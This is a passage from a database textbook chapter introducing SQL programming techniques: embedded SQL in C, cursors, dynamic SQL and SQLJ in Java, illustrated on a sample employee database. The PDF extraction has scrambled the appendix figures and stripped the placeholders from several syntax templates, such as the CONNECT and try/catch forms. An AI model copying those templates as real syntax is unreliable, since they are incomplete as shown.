450 Stone, Houston, TX

975 Fire Oak, Humble, TX

5631 Rice, Houston, TX

999887777

987654321

123456789

333445555

Minit Lname Ssn Bdate Address Sex DnoSalary Super_ssn

B

T

J

S

K

A

V

E

Houston

1

4

5

5

Essn

5

Figure A.1
One possible database state for the COMPANY relational database schema.

449

XML: Extensible Markup Language

DEPARTMENT

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

EMPLOYEE

DEPT_LOCATIONS

Dnumber Dlocation

PROJECT

Pname Pnumber Plocation Dnum

WORKS_ON

Essn Pno Hours

DEPENDENT

Essn Dependent_name Sex Bdate Relationship

Dname Dnumber Mgr_ssn Mgr_start_date

Figure A.2
Schema diagram for the
COMPANY relational
database schema.

450

XML: Extensible Markup Language

EMPLOYEE

Fname Minit Lname

Name Address

Sex

Salary

Ssn

Bdate

Supervisor Supervisee

SUPERVISION1 N

Hours

WORKS_ON

CONTROLS

M N

1

DEPENDENTS_OF

Name

Location

N

1
1 1

PROJECT

DEPARTMENT

Locations

Name Number

Number

Number_of_employees

MANAGES

Start_date

WORKS_FOR
1N

N

DEPENDENT

Sex Birth_date RelationshipName

Figure A.3
An ER schema diagram for the COMPANY database.

451

XML: Extensible Markup Language

DEPARTMENT

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

EMPLOYEE

DEPT_LOCATIONS

Dnumber Dlocation

PROJECT

Pname Pnumber Plocation Dnum

WORKS_ON

Essn Pno Hours

DEPENDENT

Essn Dependent_name Sex Bdate Relationship

Dname Dnumber Mgr_ssn Mgr_start_date

Figure A.4
Referential integrity constraints displayed
on the COMPANY relational database
schema.

452

XML: Extensible Markup Language

Publisher_nameBook_id Title

BOOK

BOOK_COPIES
Book_id Branch_id No_of_copies

BOOK_AUTHORS

Book_id Author_name

LIBRARY_BRANCH
Branch_id Branch_name Address

PUBLISHER

Name Address Phone

BOOK_LOANS

Book_id Branch_id Card_no Date_out Due_date

BORROWER
Card_no Name Address Phone

Figure A.5
A relational database
schema for a
LIBRARY database.

453

Introduction to SQL
Programming Techniques

In this chapter, we discuss some of the methods thathave been developed for accessing databases from
programs. Most database access in practical applications is accomplished through
software programs that implement database applications. This software is usually
developed in a general-purpose programming language such as Java, C/C++/C#,
COBOL, or some other programming language. In addition, many scripting lan-
guages, such as PHP and JavaScript, are also being used for programming of data-
base access within Web applications. In this chapter, we focus on how databases can
be accessed from the traditional programming languages C/C++ and Java, whereas
in the next chapter we introduce how databases are accessed from scripting lan-
guages such as PHP and JavaScript. Recall that when database statements are
included in a program, the general-purpose programming language is called the
host language, whereas the database language—SQL, in our case—is called the data
sublanguage. In some cases, special database programming languages are developed
specifically for writing database applications. Although many of these were devel-
oped as research prototypes, some notable database programming languages have
widespread use, such as Oracle’s PL/SQL (Programming Language/SQL).

It is important to note that database programming is a very broad topic. There are
whole textbooks devoted to each database programming technique and how that
technique is realized in a specific system. New techniques are developed all the time,

From Chapter 13 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and
Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-
Wesley. All rights reserved.

454

Introduction to SQL Programming Techniques

and changes to existing techniques are incorporated into newer system versions and
languages. An additional difficulty in presenting this topic is that although there are
SQL standards, these standards themselves are continually evolving, and each
DBMS vendor may have some variations from the standard. Because of this, we
have chosen to give an introduction to some of the main types of database pro-
gramming techniques and to compare these techniques, rather than study one par-
ticular method or system in detail. The examples we give serve to illustrate the main
differences that a programmer would face when using each of these database pro-
gramming techniques. We will try to use the SQL standards in our examples rather
than describe a specific system. When using a specific system, the materials in this
chapter can serve as an introduction, but should be augmented with the system
manuals or with books describing the specific system.

We start our presentation of database programming in Section 1 with an overview
of the different techniques developed for accessing a database from programs. Then,
in Section 2, we discuss the rules for embedding SQL statements into a general-pur-
pose programming language, generally known as embedded SQL. This section also
briefly discusses dynamic SQL, in which queries can be dynamically constructed at
runtime, and presents the basics of the SQLJ variation of embedded SQL that was
developed specifically for the programming language Java. In Section 3, we discuss
the technique known as SQL/CLI (Call Level Interface), in which a library of proce-
dures and functions is provided for accessing the database. Various sets of library
functions have been proposed. The SQL/CLI set of functions is the one given in the
SQL standard. Another library of functions is ODBC (Open Data Base
Connectivity). We do not describe ODBC because it is considered to be the prede-
cessor to SQL/CLI. A third library of functions—which we do describe—is JDBC;
this was developed specifically for accessing databases from Java. In Section 4 we
discuss SQL/PSM (Persistent Stored Modules), which is a part of the SQL standard
that allows program modules—procedures and functions—to be stored by the
DBMS and accessed through SQL. We briefly compare the three approaches to data-
base programming in Section 5, and provide a chapter summary in Section 6.

1 Database Programming: Techniques
and Issues

We now turn our attention to the techniques that have been developed for accessing
databases from programs and, in particular, to the issue of how to access SQL data-
bases from application programs. SQL has language constructs for various database
operations—from schema definition and constraint specification to querying,
updating, and specifying views. Most database systems have an interactive interface
where these SQL commands can be typed directly into a monitor for execution by
the database system. For example, in a computer system where the Oracle RDBMS
is installed, the command SQLPLUS starts the interactive interface. The user can

455

Introduction to SQL Programming Techniques

type SQL commands or queries directly over several lines, ended by a semicolon and
the Enter key (that is, “; “). Alternatively, a file of commands can be created
and executed through the interactive interface by typing @. The system
will execute the commands written in the file and display the results, if any.

The interactive interface is quite convenient for schema and constraint creation or
for occasional ad hoc queries. However, in practice, the majority of database inter-
actions are executed through programs that have been carefully designed and tested.
These programs are generally known as application programs or database applica-
tions, and are used as canned transactions by the end users. Another common use of
database programming is to access a database through an application program that
implements a Web interface, for example, when making airline reservations or
online purchases. In fact, the vast majority of Web electronic commerce applica-
tions include some database access commands.

In this section, first we give an overview of the main approaches to database pro-
gramming. Then we discuss some of the problems that occur when trying to access
a database from a general-purpose programming language, and the typical
sequence of commands for interacting with a database from a software program.

1.1 Approaches to Database Programming
Several techniques exist for including database interactions in application pro-
grams. The main approaches for database programming are the following:

1. Embedding database commands in a general-purpose programming lan-
guage. In this approach, database statements are embedded into the host
programming language, but they are identified by a special prefix. For exam-
ple, the prefix for embedded SQL is the string EXEC SQL, which precedes all
SQL commands in a host language program.1 A precompiler or
preproccessor scans the source program code to identify database state-
ments and extract them for processing by the DBMS. They are replaced in
the program by function calls to the DBMS-generated code. This technique
is generally referred to as embedded SQL.

2. Using a library of database functions. A library of functions is made avail-
able to the host programming language for database calls. For example, there
could be functions to connect to a database, execute a query, execute an
update, and so on. The actual database query and update commands and any
other necessary information are included as parameters in the function calls.
This approach provides what is known as an application programming
interface (API) for accessing a database from application programs.

3. Designing a brand-new language. A database programming language is
designed from scratch to be compatible with the database model and query
language. Additional programming structures such as loops and conditional

1Other prefixes are sometimes used, but this is the most common.

456

Introduction to SQL Programming Techniques

statements are added to the database language to convert it into a full-
fledged programming language. An example of this approach is Oracle’s
PL/SQL.

In practice, the first two approaches are more common, since many applications are
already written in general-purpose programming languages but require some data-
base access. The third approach is more appropriate for applications that have
intensive database interaction. One of the main problems with the first two
approaches is impedance mismatch, which does not occur in the third approach.

1.2 Impedance Mismatch
Impedance mismatch is the term used to refer to the problems that occur because
of differences between the database model and the programming language model.
For example, the practical relational model has three main constructs: columns
(attributes) and their data types, rows (also referred to as tuples or records), and
tables (sets or multisets of records). The first problem that may occur is that the
data types of the programming language differ from the attribute data types that are
available in the data model. Hence, it is necessary to have a binding for each host
programming language that specifies for each attribute type the compatible pro-
gramming language types. A different binding is needed for each programming lan-
guage because different languages have different data types. For example, the data
types available in C/C++ and Java are different, and both differ from the SQL data
types, which are the standard data types for relational databases.

Another problem occurs because the results of most queries are sets or multisets of
tuples (rows), and each tuple is formed of a sequence of attribute values. In the pro-
gram, it is often necessary to access the individual data values within individual
tuples for printing or processing. Hence, a binding is needed to map the query result
data structure, which is a table, to an appropriate data structure in the programming
language. A mechanism is needed to loop over the tuples in a query result in order
to access a single tuple at a time and to extract individual values from the tuple. The
extracted attribute values are typically copied to appropriate program variables for
further processing by the program. A cursor or iterator variable is typically used to
loop over the tuples in a query result. Individual values within each tuple are then
extracted into distinct program variables of the appropriate type.

Impedance mismatch is less of a problem when a special database programming
language is designed that uses the same data model and data types as the database
model. One example of such a language is Oracle’s PL/SQL. The SQL standard also
has a proposal for such a database programming language, known as SQL/PSM. For
object databases, the object data model is quite similar to the data model of the Java
programming language, so the impedance mismatch is greatly reduced when Java is
used as the host language for accessing a Java-compatible object database. Several
database programming languages have been implemented as research prototypes
(see the Selected Bibliography).

457

Introduction to SQL Programming Techniques

1.3 Typical Sequence of Interaction
in Database Programming

When a programmer or software engineer writes a program that requires access to a
database, it is quite common for the program to be running on one computer sys-
tem while the database is installed on another. Recall that a common architecture
for database access is the client/server model, where a client program handles the
logic of a software application, but includes some calls to one or more database
servers to access or update the data.2 When writing such a program, a common
sequence of interaction is the following:

1. When the client program requires access to a particular database, the pro-
gram must first establish or open a connection to the database server.
Typically, this involves specifying the Internet address (URL) of the machine
where the database server is located, plus providing a login account name
and password for database access.

2. Once the connection is established, the program can interact with the data-
base by submitting queries, updates, and other database commands. In gen-
eral, most types of SQL statements can be included in an application
program.

3. When the program no longer needs access to a particular database, it should
terminate or close the connection to the database.

A program can access multiple databases if needed. In some database programming
approaches, only one connection can be active at a time, whereas in other
approaches multiple connections can be established simultaneously.

In the next three sections, we discuss examples of each of the three main approaches
to database programming. Section 2 describes how SQL is embedded into a pro-
gramming language. Section 3 discusses how function calls are used to access the
database, and Section 4 discusses an extension to SQL called SQL/PSM that allows
general-purpose programming constructs for defining modules (procedures and
functions) that are stored within the database system.3 Section 5 compares these
approaches.

2 Embedded SQL, Dynamic SQL, and SQLJ
In this section, we give an overview of the technique for how SQL statements can be
embedded in a general-purpose programming language. We focus on two lan-
guages: C and Java. The examples used with the C language, known as embedded

2There are two-tier and three-tier architectures; to keep our discussion simple, we will assume a two-tier
client/server architecture here.
3SQL/PSM illustrates how typical general-purpose programming language constructs—such as loops
and conditional structures—can be incorporated into SQL.

458

Introduction to SQL Programming Techniques

SQL, are presented in Sections 2.1 through 2.3, and can be adapted to other pro-
gramming languages. The examples using Java, known as SQLJ, are presented in
Sections 2.4 and 2.5. In this embedded approach, the programming language is
called the host language. Most SQL statements—including data or constraint defi-
nitions, queries, updates, or view definitions—can be embedded in a host language
program.

2.1 Retrieving Single Tuples with Embedded SQL
To illustrate the concepts of embedded SQL, we will use C as the host programming
language.4 When using C as the host language, an embedded SQL statement is dis-
tinguished from programming language statements by prefixing it with the key-
words EXEC SQL so that a preprocessor (or precompiler) can separate embedded
SQL statements from the host language code. The SQL statements within a program
are terminated by a matching END-EXEC or by a semicolon (;). Similar rules apply
to embedding SQL in other programming languages.

Within an embedded SQL command, we may refer to specially declared C program
variables. These are called shared variables because they are used in both the C pro-
gram and the embedded SQL statements. Shared variables are prefixed by a colon (:)
when they appear in an SQL statement. This distinguishes program variable names
from the names of database schema constructs such as attributes (column names)
and relations (table names). It also allows program variables to have the same
names as attribute names, since they are distinguishable by the colon (:) prefix in the
SQL statement. Names of database schema constructs—such as attributes and rela-
tions—can only be used within the SQL commands, but shared program variables
can be used elsewhere in the C program without the colon (:) prefix.

Suppose that we want to write C programs to process the COMPANY database in
Figure A.1 in Appendix: Figures at the end of this chapter. We need to declare pro-
gram variables to match the types of the database attributes that the program will
process. The programmer can choose the names of the program variables; they may
or may not have names that are identical to their corresponding database attributes.
We will use the C program variables declared in Figure 1 for all our examples and
show C program segments without variable declarations. Shared variables are
declared within a declare section in the program, as shown in Figure 1 (lines 1
through 7).5 A few of the common bindings of C types to SQL types are as follows.
The SQL types INTEGER, SMALLINT, REAL, and DOUBLE are mapped to the C types
long, short, float, and double, respectively. Fixed-length and varying-length
strings (CHAR[i], VARCHAR[i]) in SQL can be mapped to arrays of characters (char
[i+1], varchar [i+1]) in C that are one character longer than the SQL type

4Our discussion here also applies to the C++ programming language, since we do not use any of the
object-oriented features, but focus on the database programming mechanism.
5We use line numbers in our code segments for easy reference; these numbers are not part of the actual
code.

459

Introduction to SQL Programming Techniques

Figure 1
C program variables used in the
embedded SQL examples E1 and E2.

0) int loop ;
1) EXEC SQL BEGIN DECLARE SECTION ;
2) varchar dname [16], fname [16], lname [16], address [31] ;
3) char ssn [10], bdate [11], sex [2], minit [2] ;
4) float salary, raise ;
5) int dno, dnumber ;
6) int SQLCODE ; char SQLSTATE [6] ;
7) EXEC SQL END DECLARE SECTION ;

because strings in C are terminated by a NULL character (\0), which is not part of
the character string itself.6 Although varchar is not a standard C data type, it is
permitted when C is used for SQL database programming.

Notice that the only embedded SQL commands in Figure 1 are lines 1 and 7, which
tell the precompiler to take note of the C variable names between BEGIN DECLARE
and END DECLARE because they can be included in embedded SQL statements—as
long as they are preceded by a colon (:). Lines 2 through 5 are regular C program
declarations. The C program variables declared in lines 2 through 5 correspond to
the attributes of the EMPLOYEE and DEPARTMENT tables from the COMPANY data-
base in Figure A.1. The variables declared in line 6—SQLCODE and SQLSTATE—are
used to communicate errors and exception conditions between the database system
and the executing program. Line 0 shows a program variable loop that will not be
used in any embedded SQL statement, so it is declared outside the SQL declare
section.

Connecting to the Database. The SQL command for establishing a connection
to a database has the following form:

CONNECT TO AS
AUTHORIZATION ;

In general, since a user or program can access several database servers, several con-
nections can be established, but only one connection can be active at any point in
time. The programmer or user can use the to change from the
currently active connection to a different one by using the following command:

SET CONNECTION ;

Once a connection is no longer needed, it can be terminated by the following com-
mand:

DISCONNECT ;

In the examples in this chapter, we assume that the appropriate connection has
already been established to the COMPANY database, and that it is the currently
active connection.

6SQL strings can also be mapped to char* types in C.

460

Introduction to SQL Programming Techniques

Communicating between the Program and the DBMS Using SQLCODE
and SQLSTATE. The two special communication variables that are used by the
DBMS to communicate exception or error conditions to the program are SQLCODE
and SQLSTATE. The SQLCODE variable shown in Figure 1 is an integer variable.
After each database command is executed, the DBMS returns a value in SQLCODE.
A value of 0 indicates that the statement was executed successfully by the DBMS. If
SQLCODE > 0 (or, more specifically, if SQLCODE = 100), this indicates that no
more data (records) are available in a query result. If SQLCODE < 0, this indicates some error has occurred. In some systems—for example, in the Oracle RDBMS— SQLCODE is a field in a record structure called SQLCA (SQL communication area), so it is referenced as SQLCA.SQLCODE. In this case, the definition of SQLCA must be included in the C program by including the following line: EXEC SQL include SQLCA ; In later versions of the SQL standard, a communication variable called SQLSTATE was added, which is a string of five characters. A value of ‘00000’ in SQLSTATE indi- cates no error or exception; other values indicate various errors or exceptions. For example, ‘02000’ indicates ‘no more data’ when using SQLSTATE. Currently, both SQLSTATE and SQLCODE are available in the SQL standard. Many of the error and exception codes returned in SQLSTATE are supposed to be standardized for all SQL vendors and platforms,7 whereas the codes returned in SQLCODE are not standard- ized but are defined by the DBMS vendor. Hence, it is generally better to use SQLSTATE because this makes error handling in the application programs inde- pendent of a particular DBMS. As an exercise, the reader should rewrite the exam- ples given later in this chapter using SQLSTATE instead of SQLCODE. Example of Embedded SQL Programming. Our first example to illustrate embedded SQL programming is a repeating program segment (loop) that takes as input a Social Security number of an employee and prints some information from the corresponding EMPLOYEE record in the database. The C program code is shown as program segment E1 in Figure 2. The program reads (inputs) an Ssn value and then retrieves the EMPLOYEE tuple with that Ssn from the database via the embed- ded SQL command. The INTO clause (line 5) specifies the program variables into which attribute values from the database record are retrieved. C program variables in the INTO clause are prefixed with a colon (:), as we discussed earlier. The INTO clause can be used in this way only when the query result is a single record; if multi- ple records are retrieved, an error will be generated. We will see how multiple records are handled in Section 2.2. Line 7 in E1 illustrates the communication between the database and the program through the special variable SQLCODE. If the value returned by the DBMS in SQLCODE is 0, the previous statement was executed without errors or exception conditions. Line 7 checks this and assumes that if an error occurred, it was because 7In particular, SQLSTATE codes starting with the characters 0 through 4 or A through H are supposed to be standardized, whereas other values can be implementation-defined. 461 Introduction to SQL Programming Techniques Figure 2 Program segment E1, a C program segment with embedded SQL. //Program Segment E1: 0) loop = 1 ; 1) while (loop) { 2) prompt("Enter a Social Security Number: ", ssn) ; 3) EXEC SQL 4) select Fname, Minit, Lname, Address, Salary 5) into :fname, :minit, :lname, :address, :salary 6) from EMPLOYEE where Ssn = :ssn ; 7) if (SQLCODE == 0) printf(fname, minit, lname, address, salary) 8) else printf("Social Security Number does not exist: ", ssn) ; 9) prompt("More Social Security Numbers (enter 1 for Yes, 0 for No): ", loop) ; 10) } no EMPLOYEE tuple existed with the given Ssn; therefore it outputs a message to that effect (line 8). In E1 a single record is selected by the embedded SQL query (because Ssn is a key attribute of EMPLOYEE);. When a single record is retrieved, the programmer can assign its attribute values directly to C program variables in the INTO clause, as in line 5. In general, an SQL query can retrieve many tuples. In that case, the C pro- gram will typically go through the retrieved tuples and process them one at a time. The concept of a cursor is used to allow tuple-at-a-time processing of a query result by the host language program. We describe cursors next. 2.2 Retrieving Multiple Tuples with Embedded SQL Using Cursors We can think of a cursor as a pointer that points to a single tuple (row) from the result of a query that retrieves multiple tuples. The cursor is declared when the SQL query command is declared in the program. Later in the program, an OPEN CUR- SOR command fetches the query result from the database and sets the cursor to a position before the first row in the result of the query. This becomes the current row for the cursor. Subsequently, FETCH commands are issued in the program; each FETCH moves the cursor to the next row in the result of the query, making it the cur- rent row and copying its attribute values into the C (host language) program vari- ables specified in the FETCH command by an INTO clause. The cursor variable is basically an iterator that iterates (loops) over the tuples in the query result—one tuple at a time. To determine when all the tuples in the result of the query have been processed, the communication variable SQLCODE (or, alternatively, SQLSTATE) is checked. If a FETCH command is issued that results in moving the cursor past the last tuple in the result of the query, a positive value (SQLCODE > 0) is returned in SQLCODE, indi-
cating that no data (tuple) was found (or the string ‘02000’ is returned in
SQLSTATE). The programmer uses this to terminate a loop over the tuples in the
query result. In general, numerous cursors can be opened at the same time. A

462

Introduction to SQL Programming Techniques

CLOSE CURSOR command is issued to indicate that we are done with processing
the result of the query associated with that cursor.

An example of using cursors to process a query result with multiple records is
shown in Figure 3, where a cursor called EMP is declared in line 4. The EMP cursor
is associated with the SQL query declared in lines 5 through 6, but the query is not
executed until the OPEN EMP command (line 8) is processed. The OPEN
command executes the query and fetches its result as a table into
the program workspace, where the program can loop through the individual rows
(tuples) by subsequent FETCH commands (line 9). We assume that
appropriate C program variables have been declared as in Figure 1. The program
segment in E2 reads (inputs) a department name (line 0), retrieves the matching
department number from the database (lines 1 to 3), and then retrieves the employ-
ees who work in that department via the declared EMP cursor. A loop (lines 10 to
18) iterates over each record in the query result, one at a time, and prints the
employee name. The program then reads (inputs) a raise amount for that employee
(line 12) and updates the employee’s salary in the database by the raise amount that
was provided (lines 14 to 16).

This example also illustrates how the programmer can update database records.
When a cursor is defined for rows that are to be modified (updated), we must add

Figure 3
Program segment E2, a C program segment that uses
cursors with embedded SQL for update purposes.

//Program Segment E2:
0) prompt(“Enter the Department Name: “, dname) ;
1) EXEC SQL
2) select Dnumber into :dnumber
3) from DEPARTMENT where Dname = :dname ;
4) EXEC SQL DECLARE EMP CURSOR FOR
5) select Ssn, Fname, Minit, Lname, Salary
6) from EMPLOYEE where Dno = :dnumber
7) FOR UPDATE OF Salary ;
8) EXEC SQL OPEN EMP ;
9) EXEC SQL FETCH from EMP into :ssn, :fname, :minit, :lname, :salary ;
10) while (SQLCODE == 0) {
11) printf(“Employee name is:”, Fname, Minit, Lname) ;
12) prompt(“Enter the raise amount: “, raise) ;
13) EXEC SQL
14) update EMPLOYEE
15) set Salary = Salary + :raise
16) where CURRENT OF EMP ;
17) EXEC SQL FETCH from EMP into :ssn, :fname, :minit, :lname, :salary ;
18) }
19) EXEC SQL CLOSE EMP ;

463

Introduction to SQL Programming Techniques

the clause FOR UPDATE OF in the cursor declaration and list the names of any
attributes that will be updated by the program. This is illustrated in line 7 of code
segment E2. If rows are to be deleted, the keywords FOR UPDATE must be added
without specifying any attributes. In the embedded UPDATE (or DELETE) com-
mand, the condition WHERE CURRENT OF specifies that the cur-
rent tuple referenced by the cursor is the one to be updated (or deleted), as in line
16 of E2.

Notice that declaring a cursor and associating it with a query (lines 4 through 7 in
E2) does not execute the query; the query is executed only when the OPEN command (line 8) is executed. Also notice that there is no need to include
the FOR UPDATE OF clause in line 7 of E2 if the results of the query are to be used
for retrieval purposes only (no update or delete).

General Options for a Cursor Declaration. Several options can be specified
when declaring a cursor. The general form of a cursor declaration is as follows:

DECLARE [ INSENSITIVE ] [ SCROLL ] CURSOR
[ WITH HOLD ] FOR
[ ORDER BY ]
[ FOR READ ONLY | FOR UPDATE [ OF ] ] ;

We already briefly discussed the options listed in the last line. The default is that the
query is for retrieval purposes (FOR READ ONLY). If some of the tuples in the query
result are to be updated, we need to specify FOR UPDATE OF and list
the attributes that may be updated. If some tuples are to be deleted, we need to spec-
ify FOR UPDATE without any attributes listed.

When the optional keyword SCROLL is specified in a cursor declaration, it is possi-
ble to position the cursor in other ways than for purely sequential access. A fetch
orientation can be added to the FETCH command, whose value can be one of NEXT,
PRIOR, FIRST, LAST, ABSOLUTE i, and RELATIVE i. In the latter two commands, i
must evaluate to an integer value that specifies an absolute tuple position within the
query result (for ABSOLUTE i), or a tuple position relative to the current cursor
position (for RELATIVE i). The default fetch orientation, which we used in our exam-
ples, is NEXT. The fetch orientation allows the programmer to move the cursor
around the tuples in the query result with greater flexibility, providing random
access by position or access in reverse order. When SCROLL is specified on the cur-
sor, the general form of a FETCH command is as follows, with the parts in square
brackets being optional:

FETCH [ [ ] FROM ] INTO ;

The ORDER BY clause orders the tuples so that the FETCH command will fetch them
in the specified order. It is specified in a similar manner to the corresponding clause
for SQL queries. The last two options when declaring a cursor (INSENSITIVE and
WITH HOLD) refer to transaction characteristics of database programs.

464

Introduction to SQL Programming Techniques

Figure 4
Program segment E3, a C program segment
that uses dynamic SQL for updating a table.

//Program Segment E3:
0) EXEC SQL BEGIN DECLARE SECTION ;
1) varchar sqlupdatestring [256] ;
2) EXEC SQL END DECLARE SECTION ;


3) prompt(“Enter the Update Command: “, sqlupdatestring) ;
4) EXEC SQL PREPARE sqlcommand FROM :sqlupdatestring ;
5) EXEC SQL EXECUTE sqlcommand ;

2.3 Specifying Queries at Runtime Using Dynamic SQL
In the previous examples, the embedded SQL queries were written as part of the
host program source code. Hence, any time we want to write a different query, we
must modify the program code, and go through all the steps involved (compiling,
debugging, testing, and so on). In some cases, it is convenient to write a program
that can execute different SQL queries or updates (or other operations) dynamically
at runtime. For example, we may want to write a program that accepts an SQL query
typed from the monitor, executes it, and displays its result, such as the interactive
interfaces available for most relational DBMSs. Another example is when a user-
friendly interface generates SQL queries dynamically for the user based on point-
and-click operations on a graphical schema (for example, a QBE-like interface). In
this section, we give a brief overview of dynamic SQL, which is one technique for
writing this type of database program, by giving a simple example to illustrate how
dynamic SQL can work. In Section 3, we will describe another approach for dealing
with dynamic queries.

Program segment E3 in Figure 4 reads a string that is input by the user (that string
should be an SQL update command) into the string program variable
sqlupdatestring in line 3. It then prepares this as an SQL command in line 4 by
associating it with the SQL variable sqlcommand. Line 5 then executes the command.
Notice that in this case no syntax check or other types of checks on the command are
possible at compile time, since the SQL command is not available until runtime. This
contrasts with our previous examples of embedded SQL, where the query could be
checked at compile time because its text was in the program source code.

Although including a dynamic update command is relatively straightforward in
dynamic SQL, a dynamic query is much more complicated. This is because usually
we do not know the types or the number of attributes to be retrieved by the SQL
query when we are writing the program. A complex data structure is sometimes
needed to allow for different numbers and types of attributes in the query result if
no prior information is known about the dynamic query. Techniques similar to
those that we discuss in Section 3 can be used to assign query results (and query
parameters) to host program variables.

In E3, the reason for separating PREPARE and EXECUTE is that if the command is to
be executed multiple times in a program, it can be prepared only once. Preparing
the command generally involves syntax and other types of checks by the system, as

465

Introduction to SQL Programming Techniques

well as generating the code for executing it. It is possible to combine the PREPARE
and EXECUTE commands (lines 4 and 5 in E3) into a single statement by writing

EXEC SQL EXECUTE IMMEDIATE :sqlupdatestring ;

This is useful if the command is to be executed only once. Alternatively, the pro-
grammer can separate the two statements to catch any errors after the PREPARE
statement, if any.

2.4 SQLJ: Embedding SQL Commands in Java
In the previous subsections, we gave an overview of how SQL commands can be
embedded in a traditional programming language, using the C language in our
examples. We now turn our attention to how SQL can be embedded in an object-
oriented programming language,8 in particular, the Java language. SQLJ is a stan-
dard that has been adopted by several vendors for embedding SQL in Java.
Historically, SQLJ was developed after JDBC, which is used for accessing SQL data-
bases from Java using function calls. We discuss JDBC in Section 3.2. In this section,
we focus on SQLJ as it is used in the Oracle RDBMS. An SQLJ translator will gener-
ally convert SQL statements into Java, which can then be executed through the
JDBC interface. Hence, it is necessary to install a JDBC driver when using SQLJ.9 In
this section, we focus on how to use SQLJ concepts to write embedded SQL in a Java
program.

Before being able to process SQLJ with Java in Oracle, it is necessary to import sev-
eral class libraries, shown in Figure 5. These include the JDBC and IO classes (lines
1 and 2), plus the additional classes listed in lines 3, 4, and 5. In addition, the pro-
gram must first connect to the desired database using the function call
getConnection, which is one of the methods of the oracle class in line 5 of Figure

Figure 5
Importing classes needed for including
SQLJ in Java programs in Oracle, and
establishing a connection and default
context.

1) import java.sql.* ;
2) import java.io.* ;
3) import sqlj.runtime.* ;
4) import sqlj.runtime.ref.* ;
5) import oracle.sqlj.runtime.* ;


6) DefaultContext cntxt =
7) oracle.getConnection(““, ““, ““, true) ;
8) DefaultContext.setDefaultContext(cntxt) ;

8This section assumes familiarity with object-oriented concepts and basic JAVA concepts.
9We discuss JDBC drivers in Section 3.2.

466

Introduction to SQL Programming Techniques

Figure 6
Java program vari-
ables used in SQLJ
examples J1 and J2.

1) string dname, ssn , fname, fn, lname, ln,
bdate, address ;

2) char sex, minit, mi ;
3) double salary, sal ;
4) integer dno, dnumber ;

5. The format of this function call, which returns an object of type default context,10

is as follows:

public static DefaultContext
getConnection(String url, String user, String password,
Boolean autoCommit)
throws SQLException ;

For example, we can write the statements in lines 6 through 8 in Figure 5 to connect
to an Oracle database located at the url using the login of and with automatic commitment of each command,11 and
then set this connection as the default context for subsequent commands.

In the following examples, we will not show complete Java classes or programs since
it is not our intention to teach Java. Rather, we will show program segments that
illustrate the use of SQLJ. Figure 6 shows the Java program variables used in our
examples. Program segment J1 in Figure 7 reads an employee’s Ssn and prints some
of the employee’s information from the database.

Notice that because Java already uses the concept of exceptions for error handling,
a special exception called SQLException is used to return errors or exception con-
ditions after executing an SQL database command. This plays a similar role to
SQLCODE and SQLSTATE in embedded SQL. Java has many types of predefined
exceptions. Each Java operation (function) must specify the exceptions that can be
thrown—that is, the exception conditions that may occur while executing the Java
code of that operation. If a defined exception occurs, the system transfers control to
the Java code specified for exception handling. In J1, exception handling for an
SQLException is specified in lines 7 and 8. In Java, the following structure

try {} catch () {}

is used to deal with exceptions that occur during the execution of . If
no exception occurs, the is processed directly. Exceptions

10A default context, when set, applies to subsequent commands in the program until it is changed.
11Automatic commitment roughly means that each command is applied to the database after it is exe-
cuted. The alternative is that the programmer wants to execute several related database commands and
then commit them together.

467

Introduction to SQL Programming Techniques

Figure 7
Program segment J1,
a Java program seg-
ment with SQLJ.

//Program Segment J1:
1) ssn = readEntry(“Enter a Social Security Number: “) ;
2) try {
3) #sql { select Fname, Minit, Lname, Address, Salary
4) into :fname, :minit, :lname, :address, :salary
5) from EMPLOYEE where Ssn = :ssn} ;
6) } catch (SQLException se) {
7) System.out.println(“Social Security Number does not exist: ” + ssn) ;
8) Return ;
9) }
10) System.out.println(fname + ” ” + minit + ” ” + lname + ” ” + address

+ ” ” + salary)

that can be thrown by the code in a particular operation should be specified as part
of the operation declaration or interface—for example, in the following format:

()
throws SQLException, IOException ;

In SQLJ, the embedded SQL commands within a Java program are preceded by
#sql, as illustrated in J1 line 3, so that they can be identified by the preprocessor.
The #sql is used instead of the keywords EXEC SQL that are used in embedded SQL
with the C programming language (see Section 2.1). SQLJ uses an INTO clause—
similar to that used in embedded SQL—to return the attribute values retrieved
from the database by an SQL query into Java program variables. The program vari-
ables are preceded by colons (:) in the SQL statement, as in embedded SQL.

In J1 a single tuple is retrieved by the embedded SQLJ query; that is why we are able
to assign its attribute values directly to Java program variables in the INTO clause in
line 4 in Figure 7. For queries that retrieve many tuples, SQLJ uses the concept of an
iterator, which is similar to a cursor in embedded SQL.

2.5 Retrieving Multiple Tuples in SQLJ Using Iterators
In SQLJ, an iterator is a type of object associated with a collection (set or multiset)
of records in a query result.12 The iterator is associated with the tuples and attrib-
utes that appear in a query result. There are two types of iterators:

1. A named iterator is associated with a query result by listing the attribute
names and types that appear in the query result. The attribute names must
correspond to appropriately declared Java program variables, as shown in
Figure 6.

2. A positional iterator lists only the attribute types that appear in the query
result.

12We will not discuss iterators in more detail here.

468

Introduction to SQL Programming Techniques

Figure 8
Program segment J2A, a Java program segment that uses a named iterator to
print employee information in a particular department.

//Program Segment J2A:
0) dname = readEntry(“Enter the Department Name: “) ;
1) try {
2) #sql { select Dnumber into :dnumber
3) from DEPARTMENT where Dname = :dname} ;
4) } catch (SQLException se) {
5) System.out.println(“Department does not exist: ” + dname) ;
6) Return ;
7) }
8) System.out.printline(“Employee information for Department: ” + dname) ;
9) #sql iterator Emp(String ssn, String fname, String minit, String lname,

double salary) ;
10) Emp e = null ;
11) #sql e = { select ssn, fname, minit, lname, salary
12) from EMPLOYEE where Dno = :dnumber} ;
13) while (e.next()) {
14) System.out.printline(e.ssn + ” ” + e.fname + ” ” + e.minit + ” ” +

e.lname + ” ” + e.salary) ;
15) } ;
16) e.close() ;

In both cases, the list should be in the same order as the attributes that are listed in
the SELECT clause of the query. However, looping over a query result is different for
the two types of iterators, as we shall see. First, we show an example of using a
named iterator in Figure 8, program segment J2A. Line 9 in Figure 8 shows how a
named iterator type Emp is declared. Notice that the names of the attributes in a
named iterator type must match the names of the attributes in the SQL query result.
Line 10 shows how an iterator object e of type Emp is created in the program and
then associated with a query (lines 11 and 12).

When the iterator object is associated with a query (lines 11 and 12 in Figure 8), the
program fetches the query result from the database and sets the iterator to a posi-
